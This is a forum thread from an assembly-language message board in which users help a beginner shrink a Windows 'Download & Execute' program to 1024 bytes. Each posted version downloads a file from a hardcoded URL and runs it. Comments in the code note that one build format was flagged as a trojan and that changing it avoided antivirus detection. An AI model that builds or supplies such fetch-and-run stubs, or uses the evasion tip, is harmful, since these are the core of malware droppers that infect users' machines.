flat assembler
Message board for the users of flat assembler.

Index > Windows > Download & Exec. (1024b)... Help to optimize.

Author
Thread Post new topic Reply to topic
sylwek32



Joined: 27 Apr 2006
Posts: 339
sylwek32 24 Jul 2007, 21:59
Hello,
Im a beginner in assembler programming and I wanted to use the WinAPI
to make a program which downloads and executes file

This is my source:

Code:
format pe
;use32
include 'E:\FASM\fasmw167\INCLUDE\win32ax.inc'

main:

macro loadapi api,lib 
{ 
        invoke LoadLibrary,lib 
        invoke GetProcAddress,eax,`api
        mov [_#api],eax
        jmp @f 
        _#api dd 0
        @@: 
} 

        loadapi URLDownloadToFileA,'urlmon.dll'
        loadapi kernel32,'kernel32.dll'
        loadapi ShellExecuteA,'shell32.dll'
        loadapi ExitProcess,'kernel32.dll'

        invoke _URLDownloadToFileA,0,flname ,localf,0,0
        invoke _ShellExecuteA, 0, 'open', localf,0,0,SW_SHOW
        invoke _ExitProcess,0
        ret

        flname db 'http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe',0
        localf db 'c:\some_file.exe',0

.end main
    


Unfortunately it compiles to 1536 Bytes... This is a little big..

Can you help me optimizing it please?

Thanks a lot!


Last edited by sylwek32 on 29 Jul 2007, 20:07; edited 3 times in total
Post 24 Jul 2007, 21:59
View user's profile Send private message Reply with quote
LocoDelAssembly
Your code has a bug


Joined: 06 May 2005
Posts: 4624
Location: Argentina
LocoDelAssembly 24 Jul 2007, 22:13
By a simple change I got a 1024 bytes executable but I need permission of a moderator to post
Post 24 Jul 2007, 22:13
View user's profile Send private message Reply with quote
sylwek32



Joined: 27 Apr 2006
Posts: 339
sylwek32 24 Jul 2007, 22:16
why do you need additional permission? Shocked
if you have got some technical problems maybe you can send it via pm..
Post 24 Jul 2007, 22:16
View user's profile Send private message Reply with quote
LocoDelAssembly
Your code has a bug


Joined: 06 May 2005
Posts: 4624
Location: Argentina
LocoDelAssembly 25 Jul 2007, 00:21
Because the code looks like for hackish purposes.

Well, I PMed the minor modification now...
Post 25 Jul 2007, 00:21
View user's profile Send private message Reply with quote
Yardman



Joined: 12 Apr 2005
Posts: 244
Location: US
Yardman 25 Jul 2007, 01:41
[ Post removed by author. ]


Last edited by Yardman on 04 Apr 2012, 02:31; edited 1 time in total
Post 25 Jul 2007, 01:41
View user's profile Send private message Reply with quote
LocoDelAssembly
Your code has a bug


Joined: 06 May 2005
Posts: 4624
Location: Argentina
LocoDelAssembly 25 Jul 2007, 02:04
I mean the possible utilization of this tiny program, not the way I stripped those 512 Wink

I did more or less the same as you Yardman. The only difference is that in the data import block I've just imported GetProcAddressA and LoadLibraryA, the rest of the original code remained intact.
Post 25 Jul 2007, 02:04
View user's profile Send private message Reply with quote
Yardman



Joined: 12 Apr 2005
Posts: 244
Location: US
Yardman 25 Jul 2007, 02:29
[ Post removed by author. ]


Last edited by Yardman on 17 Jan 2012, 17:58; edited 1 time in total
Post 25 Jul 2007, 02:29
View user's profile Send private message Reply with quote
kohlrak



Joined: 21 Jul 2006
Posts: 1421
Location: Uncle Sam's Pad
kohlrak 25 Jul 2007, 04:21
I wish i knew more about the server on it. It appears that it's not a standard HTTP server, and i have my own purpose for it... My idea could be considered a hack depending on opinion, but i don't want to mention the potential for since this is posted, it would be bad if some one saw it.
Post 25 Jul 2007, 04:21
View user's profile Send private message Visit poster's website AIM Address Yahoo Messenger MSN Messenger Reply with quote
sylwek32



Joined: 27 Apr 2006
Posts: 339
sylwek32 25 Jul 2007, 06:38
Thanks..
And yes my code looked like for hacking purposes...
But I planned to use it only at home.

I don't know why but if I change "format pe" to "format pe gui"
my AntiVirus Software (FreeAV) shows it's a trojan horse.


LocoDelAssembly:

As I start your version it shows there is no procedure like GetProcessAddressA
in kernel32.dll
Post 25 Jul 2007, 06:38
View user's profile Send private message Reply with quote
vador



Joined: 12 Nov 2006
Posts: 68
Location: Madagascar
vador 25 Jul 2007, 08:37
GetProcessAddressA ==> GetProcAddressA
Post 25 Jul 2007, 08:37
View user's profile Send private message Reply with quote
sylwek32



Joined: 27 Apr 2006
Posts: 339
sylwek32 25 Jul 2007, 08:48
Thats what I meant.. Sorry..
It shows there is no procedure in kernel32.dll like GetProcAddressA
Post 25 Jul 2007, 08:48
View user's profile Send private message Reply with quote
sylwek32



Joined: 27 Apr 2006
Posts: 339
sylwek32 26 Jul 2007, 21:19
I have made some modifications..

Would be great if you would help to optimize:wink:

Code:
;***************************************************
;* 1024-Bytes Download & Execute                   *
;***************************************************



   format pe ; For some reason executable with format pe
             ; gui was identified as a trojan horse by
             ; AntiVir Guard. Format PE seems to fix that.


   include 'E:\FASM\fasmw167\INCLUDE\win32ax.inc'

     main:

        macro loadapi api,lib
        {
         invoke LoadLibrary,lib
         invoke GetProcAddress,eax,`api
         mov [_#api],eax
         jmp @f
         _#api dd 0
         @@:
        }


        loadapi URLDownloadToFileA,'urlmon.dll' 
        loadapi kernel32, 'kernel32.dll' 
        loadapi ShellExecuteA,'shell32.dll' 
        loadapi ExitProcess,'kernel32.dll' 

       ; invoke _URLDownloadToFileA,0,flname ,localf,0,0
        push 0
        push 0
        push strLocalfile
        push strURL
        push 0
        call [_URLDownloadToFileA]

       ; invoke _ShellExecuteA, 0, optrd, localf, 0,0,SW_SHOW
        push SW_SHOW
        push 0
        push 0
        push strLocalfile
        push strFunction
        push 0
        call [_ShellExecuteA]

       ; invoke _ExitProcess,0
       push 0
       call [_ExitProcess]
       ret

       strURL       db 'http://flatassembler.net/fasmw167.zip',0
       strLocalfile db 'c:\fasm.zip',0
       strFunction  db 'open',0

             align 4


        data import
        library kernel,'KERNEL32.DLL'

        import kernel,\
        LoadLibrary,'LoadLibraryA',\
        GetProcAddress,'GetProcAddress'

        end data

    ;eof
    
Post 26 Jul 2007, 21:19
View user's profile Send private message Reply with quote
asmfan



Joined: 11 Aug 2006
Posts: 392
Location: Russian
asmfan 27 Jul 2007, 07:08
call not addresses but registers
mov esi,LoadLibrary
call [esi]
call [esi - LoadLibrary + GetProcAddress] ;call GetProcAddress
etc.
It woul be cheaper to make one import table merged to code without searching addresses at all.
replace ExitProcess with ret.
Replace absolute addressing to inc files with relative (to %fasminc%).
Don't use ['open',0] cuz ShellExecute ran with 0 as a parameter treats it as 'open'.
Post 27 Jul 2007, 07:08
View user's profile Send private message Reply with quote
sylwek32



Joined: 27 Apr 2006
Posts: 339
sylwek32 28 Jul 2007, 17:38
thanks
Post 28 Jul 2007, 17:38
View user's profile Send private message Reply with quote
sylwek32



Joined: 27 Apr 2006
Posts: 339
sylwek32 29 Jul 2007, 10:51
Some cleaned version:

Code:
;***************************************************
;* 1024-Bytes Download & Execute                   *
;***************************************************



   format pe ; For some reason executable with format pe
             ; gui was identified as a trojan horse by
             ; AntiVir Guard. Format PE seems to fix that.


   include '%fasminc%\win32ax.inc'

     main:

        ;Imports moved

        ; invoke _URLDownloadToFileA,0,strURL ,strLocalfile,0,0
        push 0
        push 0
        push strLocalfile
        push strURL
        push 0
        call [URLDownloadToFileA]

       ; invoke _ShellExecuteA, 0, strFunction, strLocalfile, 0,0,SW_SHOW
        push SW_SHOW
        push 0
        push 0
        push strLocalfile
        push 0 ;0 is open
        push 0
        call [ShellExecuteA]


       ; invoke _ExitProcess,0
       push 0
       call [ExitProcess]
       ret

       strURL       db 'http://flatassembler.net/fasmw167.zip',0
       strLocalfile db 'c:\fasm.zip',0

       align 4


        data import
        library kernel,  'KERNEL32.DLL',\
                shell32, 'SHELL32.DLL',\
                urlmon,  'URLMON.DLL',\
                user32,  'USER32.DLL'

        import kernel,\
        LoadLibrary,     'LoadLibraryA',\
        GetProcAddress,  'GetProcAddressA',\
        ExitProcess,     'ExitProcess'

        import shell32,\
        ShellExecuteA,   'ShellExecuteA'




        import urlmon,\
        URLDownloadToFileA,'URLDownloadToFileA'

        end data

    ;eof
    
Post 29 Jul 2007, 10:51
View user's profile Send private message Reply with quote
sylwek32



Joined: 27 Apr 2006
Posts: 339
sylwek32 31 Jul 2007, 14:54
New version.
Suggestions are welcome!

Thanks for them.

Code:
;***************************************************
;* 1024-Bytes Download & Execute rev. 20           *
;***************************************************



   format pe ; For some reason executable with format pe
             ; gui was identified as a trojan horse by
             ; AntiVir Guard. Format PE seems to fix that.


   include '%fasminc%\win32ax.inc'

     main:

        ;Imports moved

        ; Download strURL to strLocalfile
        ; invoke _URLDownloadToFileA,0,strURL ,strLocalfile,0,0
        xor eax,eax
        push eax
        push eax
        push strLocalfile
        push strURL
        push eax
        mov esi,LoadLibrary
        call DWORD [esi - LoadLibrary + URLDownloadToFileA] ;URLDownloadToFileA

        ; Execute Downloaded strLocalfile
        ; invoke _ShellExecuteA, 0, strFunction, strLocalfile, 0,0,SW_SHOW
        push SW_SHOW
        push eax
        push eax
        push strLocalfile
        push eax ;eax=0 and 0 is open
        push eax
        call DWORD [esi - LoadLibrary + ShellExecuteA] ;ShellExecuteA

        ; Exit Process
        push eax
        call DWORD [esi - LoadLibrary + ExitProcess] ;ExitProcess
        call DWORD [esi - LoadLibrary + ExitThread]  ;ExitThread
        ret

        strURL       db 'http://flatassembler.net/fasmw167.zip',0
        strLocalfile db 'c:\fasmw167.zip',0

        align 4


        data import
        library kernel,  'KERNEL32.DLL',\
                shell32, 'SHELL32.DLL',\
                urlmon,  'URLMON.DLL',\
                user32,  'USER32.DLL'

        import  kernel,\
                LoadLibrary,       'LoadLibraryA',\
                GetProcAddress,    'GetProcAddressA',\
                ExitProcess,       'ExitProcess',\
                ExitThread,        'ExitThread'

        import  shell32,\
                ShellExecuteA,     'ShellExecuteA'

        import  urlmon,\
                URLDownloadToFileA,'URLDownloadToFileA'

        end data

    ;eof
    
Post 31 Jul 2007, 14:54
View user's profile Send private message Reply with quote
Display posts from previous:
Post new topic Reply to topic

Jump to:  


< Last Thread | Next Thread >
Forum Rules:
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You cannot attach files in this forum
You can download files in this forum


Copyright © 1999-2024, Tomasz Grysztar. Also on GitHub, YouTube.

Website powered by rwasa.